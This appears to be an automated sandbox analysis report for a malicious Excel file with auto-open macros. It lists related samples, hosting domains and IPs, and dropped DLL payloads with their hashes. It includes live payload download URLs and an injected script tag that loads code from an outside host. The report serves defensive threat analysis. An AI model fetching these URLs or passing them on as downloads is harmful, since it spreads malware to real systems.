                                                                                              P22l0y2mfd.dllGet hashmaliciousBrowse
                                                                                                ik1z1nXXuU.dllGet hashmaliciousBrowse
                                                                                                  xWvN5HkNDU.dllGet hashmaliciousBrowse
                                                                                                    td722u34As.dllGet hashmaliciousBrowse
                                                                                                      2vMjDd8z34.dllGet hashmaliciousBrowse
                                                                                                        R78g1mgKDg.dllGet hashmaliciousBrowse
                                                                                                          td722u34As.dllGet hashmaliciousBrowse

                                                                                                            Domains

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            domesticuif.co.zauntitled 9456.xlsGet hashmaliciousBrowse
                                                                                                            • 196.22.142.203
                                                                                                            Nachricht_1307.zipGet hashmaliciousBrowse
                                                                                                            • 196.22.142.203
                                                                                                            Liste_13072022.zipGet hashmaliciousBrowse
                                                                                                            • 196.22.142.203
                                                                                                            j_37501116.zipGet hashmaliciousBrowse
                                                                                                            • 196.22.142.203
                                                                                                            List_5.doc.xlsGet hashmaliciousBrowse
                                                                                                            • 196.22.142.203
                                                                                                            atici.netuntitled 9456.xlsGet hashmaliciousBrowse
                                                                                                            • 185.15.196.157
                                                                                                            Nachricht_1307.zipGet hashmaliciousBrowse
                                                                                                            • 185.15.196.157
                                                                                                            Liste_13072022.zipGet hashmaliciousBrowse
                                                                                                            • 185.15.196.157
                                                                                                            j_37501116.zipGet hashmaliciousBrowse
                                                                                                            • 185.15.196.157
                                                                                                            List_5.doc.xlsGet hashmaliciousBrowse
                                                                                                            • 185.15.196.157
                                                                                                            Fattura 2022 - IT 00365.zipGet hashmaliciousBrowse
                                                                                                            • 185.15.196.157
                                                                                                            Rechnung 2022.06.07_1156.xlsGet hashmaliciousBrowse
                                                                                                            • 185.15.196.157
                                                                                                            County Contract - 2022-07-06_1039.xlsGet hashmaliciousBrowse
                                                                                                            • 185.15.196.157
                                                                                                            fattura luglio 2022.xlsGet hashmaliciousBrowse
                                                                                                            • 185.15.196.157
                                                                                                            atperson.comuntitled 9456.xlsGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            Nachricht_1307.zipGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            Liste_13072022.zipGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            j_37501116.zipGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            List_5.doc.xlsGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            Fattura 2022 - IT 00365.zipGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            Rechnung 2022.06.07_1156.xlsGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            County Contract - 2022-07-06_1039.xlsGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            fattura luglio 2022.xlsGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114

                                                                                                            ASNs

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            DIGITALOCEAN-ASNUScVtjqSXOHA_bin.jsGet hashmaliciousBrowse
                                                                                                            • 139.59.177.165
                                                                                                            QpA1sFLQin.dllGet hashmaliciousBrowse
                                                                                                            • 159.89.0.163
                                                                                                            0HVVcaZuD1.exeGet hashmaliciousBrowse
                                                                                                            • 64.225.91.73
                                                                                                            OYUn5FzAW3Get hashmaliciousBrowse
                                                                                                            • 45.55.195.236
                                                                                                            KFAg5Ju8XNGet hashmaliciousBrowse
                                                                                                            • 95.85.2.17
                                                                                                            PYCkUgesWB.dllGet hashmaliciousBrowse
                                                                                                            • 64.227.55.231
                                                                                                            2BQPIiVlqe.dllGet hashmaliciousBrowse
                                                                                                            • 174.138.33.49
                                                                                                            nz032vqLOi.dllGet hashmaliciousBrowse
                                                                                                            • 64.227.55.231
                                                                                                            nz032vqLOi.dllGet hashmaliciousBrowse
                                                                                                            • 64.227.55.231
                                                                                                            j6gMU3agR1.dllGet hashmaliciousBrowse
                                                                                                            • 46.101.137.169
                                                                                                            azKC4bycQq.dllGet hashmaliciousBrowse
                                                                                                            • 64.227.55.231
                                                                                                            azKC4bycQq.dllGet hashmaliciousBrowse
                                                                                                            • 64.227.55.231
                                                                                                            http://179.43.144.210Get hashmaliciousBrowse
                                                                                                            • 104.236.66.100
                                                                                                            ZXH6P5yG3A.exeGet hashmaliciousBrowse
                                                                                                            • 161.35.49.148
                                                                                                            iN9u7DdJv4.exeGet hashmaliciousBrowse
                                                                                                            • 64.225.91.73
                                                                                                            xd.x86Get hashmaliciousBrowse
                                                                                                            • 167.71.77.54
                                                                                                            bLJR1tSMfo.dllGet hashmaliciousBrowse
                                                                                                            • 174.138.33.49
                                                                                                            bLJR1tSMfo.dllGet hashmaliciousBrowse
                                                                                                            • 178.62.112.199
                                                                                                            allegato-5.xlsGet hashmaliciousBrowse
                                                                                                            • 178.62.112.199
                                                                                                            HUrHMu39FU.dllGet hashmaliciousBrowse
                                                                                                            • 64.227.55.231
                                                                                                            OVHFRc4unvHNB66.exeGet hashmaliciousBrowse
                                                                                                            • 54.39.107.26
                                                                                                            WSLbVByXh6.exeGet hashmaliciousBrowse
                                                                                                            • 54.39.107.26
                                                                                                            jdgwhtT8e0.exeGet hashmaliciousBrowse
                                                                                                            • 51.81.143.170
                                                                                                            GsszZ7R99d.exeGet hashmaliciousBrowse
                                                                                                            • 217.182.169.148
                                                                                                            C2BLjRGYWr.exeGet hashmaliciousBrowse
                                                                                                            • 54.39.107.26
                                                                                                            QeTI24e25Q.exeGet hashmaliciousBrowse
                                                                                                            • 142.44.133.80
                                                                                                            1MWUDNFaqS.exeGet hashmaliciousBrowse
                                                                                                            • 51.81.194.202
                                                                                                            fI43NnTTHp.exeGet hashmaliciousBrowse
                                                                                                            • 51.222.30.164
                                                                                                            E65Jn7N2og.exeGet hashmaliciousBrowse
                                                                                                            • 54.39.107.26
                                                                                                            38zspo3ygQ.exeGet hashmaliciousBrowse
                                                                                                            • 54.39.107.26
                                                                                                            JuWK51esuy.exeGet hashmaliciousBrowse
                                                                                                            • 54.39.107.26
                                                                                                            SfJ9WTcxQFGet hashmaliciousBrowse
                                                                                                            • 37.59.96.150
                                                                                                            Cyr87DGYzSGet hashmaliciousBrowse
                                                                                                            • 46.105.229.91
                                                                                                            XZm7Ogz35KGet hashmaliciousBrowse
                                                                                                            • 37.187.28.202
                                                                                                            3DB3FA9C6911D2585A4DE4AEE63A9755639F20EBDD732.exeGet hashmaliciousBrowse
                                                                                                            • 142.44.224.16
                                                                                                            8B41F1A7600C31472ED6FA7C0D57D8F0309D888850C67.exeGet hashmaliciousBrowse
                                                                                                            • 142.44.224.16
                                                                                                            PYCkUgesWB.dllGet hashmaliciousBrowse
                                                                                                            • 54.37.228.122
                                                                                                            nz032vqLOi.dllGet hashmaliciousBrowse
                                                                                                            • 37.187.114.15
                                                                                                            nz032vqLOi.dllGet hashmaliciousBrowse
                                                                                                            • 54.37.228.122
                                                                                                            azKC4bycQq.dllGet hashmaliciousBrowse
                                                                                                            • 54.37.228.122

                                                                                                            JA3 Fingerprints

                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                            7dcce5b76c8b17472d024758970a406b71nkwnC9VZ.docGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            allegato-5.xlsGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            0_202207983404715942.xlsGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            2021-EXTENSION.docGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            2021-EXTENSION.docGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            https://express.adobe.com/page/4MeC1smERSjjG/Get hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            virus.xlsmGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            virus.xlsmGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            https://myztt.com/fr/quad/Get hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            untitled 9456.xlsGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            202207852616307159.xlsmGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            sin t#U00edtulo-6813.xlsGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            sample20220714-01.xlsmGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            AWB #8347630147.htmGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            List_1107.xlsGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            list_13072022.xlsGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            list_5912757.xlsGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            List_5.doc.xlsGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            Mail-1107.xlsGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114
                                                                                                            Mail-12072022.xlsGet hashmaliciousBrowse
                                                                                                            • 51.38.169.114

                                                                                                            Dropped Files

                                                                                                            No context

                                                                                                            Created / dropped Files

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                                                            File Type:Microsoft Cabinet archive data, 61712 bytes, 1 file
                                                                                                            Category:dropped
                                                                                                            Size (bytes):61712
                                                                                                            Entropy (8bit):7.995044632446497
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx
                                                                                                            MD5:589C442FC7A0C70DCA927115A700D41E
                                                                                                            SHA1:66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31
                                                                                                            SHA-256:2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A
                                                                                                            SHA-512:1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:MSCF............,...................I........y.........Tf. .authroot.stl..W.`.4..CK..8U[...q.yL'sf!d.D..."2.2g.<dVI.!.....$).\...!2s..(...[.T7..{}...g....g.....w.km$.&|..qe.n.8+..&...O...`...+..C......`h!0.I.(C..1Q*L.p..".s..B.....H......fUP@..5...(X#.t.2lX.>.y|D.0Z0...M....I(.#.-... ...(.J....2..`.hO..{l+.bd7y.j..u.....3....<......3....s.T...._.'...%{v...s..............KgV.0..X=.A.9w9.Ea.x..........\.=.e.C2......9.......`.o... .......@pm.. a.....-M.....{...s.mW.....;.+...A......0.g..L9#.v.&O>./xSH.S.....GH.6.j...`2.(0g..... Lt........h4.iQ?....[.K.....uI......}.....d....M.....6q.Q~.0.\.'U^)`..u.....-........d..7...2.-.2+3.....A./.%Q...k...Q.,...H.B.%..O..x..5\...Hk.......B.';"Ym.'....X.l.E.6..a8.6..nq..x.r4..1t.....,..u.O..O.L...Uf...X.u.F .(.(.....".q...n{%U.-u....l6!....Z....~o0.}Q'.s.i....7...>4x...A.h.Mk].O.z.].6...53...b^;..>e..x.'1..\p.O.k..B1w..|..K.R.....2.e0..X.^...I...w..!.v5B]x..z.6.G^uF..].b.W...'..I.;..p..@L{.E..@W..3.&...

                                                                                                            C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):326
                                                                                                            Entropy (8bit):3.1239279911554383
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:kKzB+N+SkQlPlEGYRMY9z+4KlDA3RUeWlEZ21:9NkPlE99SNxAhUeE1
                                                                                                            MD5:252E99215585B4C82C5FE41F1C3B7112
                                                                                                            SHA1:4D4EB596D9E11F93837491D73DF78FBCBC43CDC7
                                                                                                            SHA-256:4C92D8FE223B295BF1EF8D11EECC77CC3D8B81AD7C9B8FB2F87477F27E325641
                                                                                                            SHA-512:4E0CF05DE460D2736CF73773971984623CD78DBD4AD2D05213DDEF4FDC3593A931C0C5D10F470704900F2169B4A2736AA681A8C14C1F63697E53CC653F584800
                                                                                                            Malicious:false
                                                                                                            Preview:p...... ..........s.....(....................................................... .........L.........$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.9.f.4.c.9.6.9.8.b.d.8.1.:.0."...

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\I7IggNeBzEXeF5[1].dll

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):850944
                                                                                                            Entropy (8bit):7.372720093100094
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:jRCGXj4KVB9abMfyzfqvHWnyPv+LVHT2+2JNdX712kBjtOJZObrGzifb97Vw+Uvf:kGXj3X7FjkZqrqiBVwDbu5nP2F
                                                                                                            MD5:1DD34935A785A419FB552B5086EA682E
                                                                                                            SHA1:C6C966E4BA623F9972273DE07B842FFBB9A9EFCE
                                                                                                            SHA-256:8B5A10F9A8F2B25057442111A01FAF021EF7E048EAB875A4078A44758D952C6F
                                                                                                            SHA-512:79AB4A827FD581CD87FAD4B0470BFCAF26F9471181C6C199706C54CC1B636CC7719306FEAC1B50C24D051F65C3B4D84BC662B8E33C03A1FCED07F8023689DCFC
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Metadefender, Detection: 54%, Browse
                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                            IE Cache URL:http://domesticuif.co.za/libraries/nbnH9dpd/
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..t7..t7..t7w.w6..t7w.q6!.t7w.p6..t7..q6..t7..p6..t7..w6..t7w.u6..t7..u7.t7e.q6..t7e.t6..t7e.7..t7...7..t7e.v6..t7Rich..t7................PE..d...)v.b.........." .........\......T,.......................................`............ .....................................................d....... ....0..8F...........P..........................................8...............8............................text............................... ..`.rdata...-..........................@..@.data...@'..........................@....pdata..8F...0...H..................@..@_RDATA...............>..............@..@.rsrc... ............@..............@..@.reloc.......P......................@..B........................................................................................................................................................................................

                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\8WkzZvRZPr2gVDdMW[1].dll

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:data
                                                                                                            Category:downloaded
                                                                                                            Size (bytes):850944
                                                                                                            Entropy (8bit):7.37324879882937
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:lRCGXj4KVB9abMfyzfqvHWnyPv+LVHT2+2JNdX712kBjtOqZObrGzifb97Vw+Uvf:2GXj3X7FjjZqrqiBVwDbu5nP2F
                                                                                                            MD5:68C1437A04D22EDC1F49863CD9998827
                                                                                                            SHA1:8BC83ED7DC50F8EC8D90FC3C607F8A98EB413388
                                                                                                            SHA-256:435E4DA38AC4595B70D53653C0E1F9485211BAA9A9FF2F30CB83CC4FD27C4106
                                                                                                            SHA-512:D43CF99D1D08741CFD3143D4FC77EB314C4FAA2B1D6F372F22771D6909BB7B4DDC85037E7B5B58C6A2BE7C232A24AF774AEDA5E153B58458A748A7F1C1CD044D
                                                                                                            Malicious:true
                                                                                                            IE Cache URL:http://atici.net/c/JDFDBMIz/
                                                                                                            Preview:<script src='https://js.cofounderspecials.com/splash.js?v=1.1.1' type='text/javascript'></script>MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..t7..t7..t7w.w6..t7w.q6!.t7w.p6..t7..q6..t7..p6..t7..w6..t7w.u6..t7..u7.t7e.q6..t7e.t6..t7e.7..t7...7..t7e.v6..t7Rich..t7................PE..d...)v.b.........." .........\......T,.......................................`............ .....................................................d....... ....0..8F...........P..........................................8...............8............................text............................... ..`.rdata...-..........................@..@.data...@'..........................@....pdata..8F...0...H..................@..@_RDATA...............>..............@..@.rsrc... ............@..............@..@.reloc.......P......................@..B.......................................................................................

                                                                                                            C:\Users\user\AppData\Local\Temp\CabCCDB.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                                                            File Type:Microsoft Cabinet archive data, 61712 bytes, 1 file
                                                                                                            Category:dropped
                                                                                                            Size (bytes):61712
                                                                                                            Entropy (8bit):7.995044632446497
                                                                                                            Encrypted:true
                                                                                                            SSDEEP:1536:gzjJiDImMsrjCtGLaexX/zL09mX/lZHIxs:gPJiDI/sr0Hexv/0S/zx
                                                                                                            MD5:589C442FC7A0C70DCA927115A700D41E
                                                                                                            SHA1:66A07DACE3AFBFD1AA07A47E6875BEAB62C4BB31
                                                                                                            SHA-256:2E5CB72E9EB43BAAFB6C6BFCC573AAC92F49A8064C483F9D378A9E8E781A526A
                                                                                                            SHA-512:1B5FA79E52BE495C42CF49618441FB7012E28C02E7A08A91DA9213DB3AB810F0E83485BC1DD5F625A47D0BA7CFCDD5EA50ACC9A8DCEBB39F048C40F01E94155B
                                                                                                            Malicious:false
                                                                                                            Preview:MSCF............,...................I........y.........Tf. .authroot.stl..W.`.4..CK..8U[...q.yL'sf!d.D..."2.2g.<dVI.!.....$).\...!2s..(...[.T7..{}...g....g.....w.km$.&|..qe.n.8+..&...O...`...+..C......`h!0.I.(C..1Q*L.p..".s..B.....H......fUP@..5...(X#.t.2lX.>.y|D.0Z0...M....I(.#.-... ...(.J....2..`.hO..{l+.bd7y.j..u.....3....<......3....s.T...._.'...%{v...s..............KgV.0..X=.A.9w9.Ea.x..........\.=.e.C2......9.......`.o... .......@pm.. a.....-M.....{...s.mW.....;.+...A......0.g..L9#.v.&O>./xSH.S.....GH.6.j...`2.(0g..... Lt........h4.iQ?....[.K.....uI......}.....d....M.....6q.Q~.0.\.'U^)`..u.....-........d..7...2.-.2+3.....A./.%Q...k...Q.,...H.B.%..O..x..5\...Hk.......B.';"Ym.'....X.l.E.6..a8.6..nq..x.r4..1t.....,..u.O..O.L...Uf...X.u.F .(.(.....".q...n{%U.-u....l6!....Z....~o0.}Q'.s.i....7...>4x...A.h.Mk].O.z.].6...53...b^;..>e..x.'1..\p.O.k..B1w..|..K.R.....2.e0..X.^...I...w..!.v5B]x..z.6.G^uF..].b.W...'..I.;..p..@L{.E..@W..3.&...

                                                                                                            C:\Users\user\AppData\Local\Temp\TarCCDC.tmp

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                                                            File Type:data
                                                                                                            Category:modified
                                                                                                            Size (bytes):162298
                                                                                                            Entropy (8bit):6.30209028339373
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:1ra6crtilgCyNY2IpFQNujcz5YJkKCC/rH8Zz04D8rlCMiB3XlMc6h:1x0imCy6QNujcmJkr97MiVGzh
                                                                                                            MD5:7EE994C83F2744D702CBA18693ED1758
                                                                                                            SHA1:17EAA8A28E7ABF096E97537EFE25A34CD7C1FD80
                                                                                                            SHA-256:5DB917AB6DC8A42A43617850DFBE2C7F26A7F810B229B349E9DD2A2D615671D2
                                                                                                            SHA-512:D5ED3AD13D58B6D41347D4521F71F9C5DCC3CA706AD1E3A96A9837C8E9087EB511896CA5B49904FC13E6FA176960F4B538379638FCF1D5E8DF6B30072F216BDA
                                                                                                            Malicious:false
                                                                                                            Preview:0..y...*.H.........y.0..y....1.0...`.H.e......0..jC..+.....7.....j30..j.0...+.....7........{.ZV....220608070702Z0...+......0..i.0..D.....`...@.,..0..0.r1..*0...+.....7..h1......+h...0...+.....7..~1......D...0...+.....7..i1...0...+.....7<..0 ..+.....7...1.......@N...%.=.,..0$..+.....7...1......`@V'..%..*..S.Y.00..+.....7..b1". .].L4.>..X...E.W..'..........-@w0Z..+.....7...1L.JM.i.c.r.o.s.o.f.t. .R.o.o.t. .C.e.r.t.i.f.i.c.a.t.e. .A.u.t.h.o.r.i.t.y...0..,...........[./..uIv..%1...0...+.....7..h1.....6.M...0...+.....7..~1...........0...+.....7...1...0...+.......0 ..+.....7...1...O..V.........b0$..+.....7...1...>.)....s,.=$.~R.'..00..+.....7..b1". [x.....[....3x:_....7.2...Gy.cS.0D..+.....7...16.4V.e.r.i.S.i.g.n. .T.i.m.e. .S.t.a.m.p.i.n.g. .C.A...0......4...R....2.7.. ...1..0...+.....7..h1......o&...0...+.....7..i1...0...+.....7<..0 ..+.....7...1...lo...^....[...J@0$..+.....7...1...J\u".F....9.N...`...00..+.....7..b1". ...@.....G..d..m..$.....X...}0B..+.....7...14.2M.i.c.r.o.s.o

                                                                                                            C:\Users\user\AppData\Local\Temp\~DF1E4410AE8F56E453.TMP

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):28672
                                                                                                            Entropy (8bit):2.774247445744387
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:768:TkPhKpb8rGYrMPe3q7Q0XV5xtezEs/68/dgArHW:TkKpb8rGYrMPe3q7Q0XV5xtezEsi8/dm
                                                                                                            MD5:C716FE74F4135BF17354A4D3FB9A76BA
                                                                                                            SHA1:89D3A843A59B088E70FB10D34731D8EBEBAF5904
                                                                                                            SHA-256:9F06FD0C645A2FEBE4B169E7D033294BBC938DFD798840FD981F43504C1BB89D
                                                                                                            SHA-512:77C947C17EBAA8FCA3A07F7DB6630031B58FAFBAC85D2364FDD1979D0A8F85406B575100F1317E936BDDF919A9B083950BE18E262065F8B0DB4CC9D3393CA9EB
                                                                                                            Malicious:false
                                                                                                            Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                            C:\Users\user\Desktop\Bericht 6581.xls

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1251, Author: Dream, Last Saved By: RGSGK, Name of Creating Application: Microsoft Excel, Create Time/Date: Fri Jun 5 19:19:34 2015, Last Saved Time/Date: Wed Jul 13 08:31:28 2022, Security: 0
                                                                                                            Category:dropped
                                                                                                            Size (bytes):98304
                                                                                                            Entropy (8bit):4.8398228718020695
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:1536:mkKpb8rGYrMPe3q7Q0XV5xtezEsi8/dg2HuS4hcTO97v7UYdEJm1:5Kpb8rGYrMPe3q7Q0XV5xtezEsi8/dgx
                                                                                                            MD5:F5EE774409F60C93C21AFB1C1D944163
                                                                                                            SHA1:403B16A1139665FCABF35B0CDD7EE49073D2729B
                                                                                                            SHA-256:4A7EBFBB2437D5FBB4331DF82D77E0F536D9B6E6DF640EBA4C98FB8618E6C1A0
                                                                                                            SHA-512:6F769AFDCF0C7E1E61598062E481D5B52C89020F5D9C238AEF10F33213B262311B0FC9E258EDDF00A3CBF5AA1B84795DF91BA97150381D125858CD9CB2C18121
                                                                                                            Malicious:true
                                                                                                            Yara Hits:
                                                                                                            • Rule: SUSP_Excel4Macro_AutoOpen, Description: Detects Excel4 macro use with auto open / close, Source: C:\Users\user\Desktop\Bericht 6581.xls, Author: John Lambert @JohnLaTwC
                                                                                                            Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................ZO..........................\.p....user B.....a.........=........................-.B.0...=.8.3.0.....................................=........Ve18.......X.@...........".......................1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1...................C.a.l.i.b.r.i.1..............

                                                                                                            C:\Users\user\soci3.ocx

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:data
                                                                                                            Category:dropped
                                                                                                            Size (bytes):850944
                                                                                                            Entropy (8bit):7.37324879882937
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:lRCGXj4KVB9abMfyzfqvHWnyPv+LVHT2+2JNdX712kBjtOqZObrGzifb97Vw+Uvf:2GXj3X7FjjZqrqiBVwDbu5nP2F
                                                                                                            MD5:68C1437A04D22EDC1F49863CD9998827
                                                                                                            SHA1:8BC83ED7DC50F8EC8D90FC3C607F8A98EB413388
                                                                                                            SHA-256:435E4DA38AC4595B70D53653C0E1F9485211BAA9A9FF2F30CB83CC4FD27C4106
                                                                                                            SHA-512:D43CF99D1D08741CFD3143D4FC77EB314C4FAA2B1D6F372F22771D6909BB7B4DDC85037E7B5B58C6A2BE7C232A24AF774AEDA5E153B58458A748A7F1C1CD044D
                                                                                                            Malicious:false
                                                                                                            Preview:<script src='https://js.cofounderspecials.com/splash.js?v=1.1.1' type='text/javascript'></script>MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..t7..t7..t7w.w6..t7w.q6!.t7w.p6..t7..q6..t7..p6..t7..w6..t7w.u6..t7..u7.t7e.q6..t7e.t6..t7e.7..t7...7..t7e.v6..t7Rich..t7................PE..d...)v.b.........." .........\......T,.......................................`............ .....................................................d....... ....0..8F...........P..........................................8...............8............................text............................... ..`.rdata...-..........................@..@.data...@'..........................@....pdata..8F...0...H..................@..@_RDATA...............>..............@..@.rsrc... ............@..............@..@.reloc.......P......................@..B.......................................................................................

                                                                                                            C:\Users\user\soci4.ocx

                                                                                                            Download File
                                                                                                            Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):850944
                                                                                                            Entropy (8bit):7.372720093100094
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:jRCGXj4KVB9abMfyzfqvHWnyPv+LVHT2+2JNdX712kBjtOJZObrGzifb97Vw+Uvf:kGXj3X7FjkZqrqiBVwDbu5nP2F
                                                                                                            MD5:1DD34935A785A419FB552B5086EA682E
                                                                                                            SHA1:C6C966E4BA623F9972273DE07B842FFBB9A9EFCE
                                                                                                            SHA-256:8B5A10F9A8F2B25057442111A01FAF021EF7E048EAB875A4078A44758D952C6F
                                                                                                            SHA-512:79AB4A827FD581CD87FAD4B0470BFCAF26F9471181C6C199706C54CC1B636CC7719306FEAC1B50C24D051F65C3B4D84BC662B8E33C03A1FCED07F8023689DCFC
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Metadefender, Detection: 54%, Browse
                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
                                                                                                            Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........d..t7..t7..t7w.w6..t7w.q6!.t7w.p6..t7..q6..t7..p6..t7..w6..t7w.u6..t7..u7.t7e.q6..t7e.t6..t7e.7..t7...7..t7e.v6..t7Rich..t7................PE..d...)v.b.........." .........\......T,.......................................`............ .....................................................d....... ....0..8F...........P..........................................8...............8............................text............................... ..`.rdata...-..........................@..@.data...@'..........................@....pdata..8F...0...H..................@..@_RDATA...............>..............@..@.rsrc... ............@..............@..@.reloc.......P......................@..B........................................................................................................................................................................................

                                                                                                            C:\Windows\System32\NfgWijQQRQpENoq\gUYUkALTAiOgx.dll (copy)

                                                                                                            Download File
                                                                                                            Process:C:\Windows\System32\regsvr32.exe
                                                                                                            File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                            Category:dropped
                                                                                                            Size (bytes):850944
                                                                                                            Entropy (8bit):7.372720093100094
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12288:jRCGXj4KVB9abMfyzfqvHWnyPv+LVHT2+2JNdX712kBjtOJZObrGzifb97Vw+Uvf:kGXj3X7FjkZqrqiBVwDbu5nP2F
                                                                                                            MD5:1DD34935A785A419FB552B5086EA682E
                                                                                                            SHA1:C6C966E4BA623F9972273DE07B842FFBB9A9EFCE
                                                                                                            SHA-256:8B5A10F9A8F2B25057442111A01FAF021EF7E048EAB875A4078A44758D952C6F
                                                                                                            SHA-512:79AB4A827FD581CD87FAD4B0470BFCAF26F9471181C6C199706C54CC1B636CC7719306FEAC1B50C24D051F65C3B4D84BC662B8E33C03A1FCED07F8023689DCFC
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: Metadefender, Detection: 54%, Browse
                                                                                                            • Antivirus: ReversingLabs, Detection: 88%
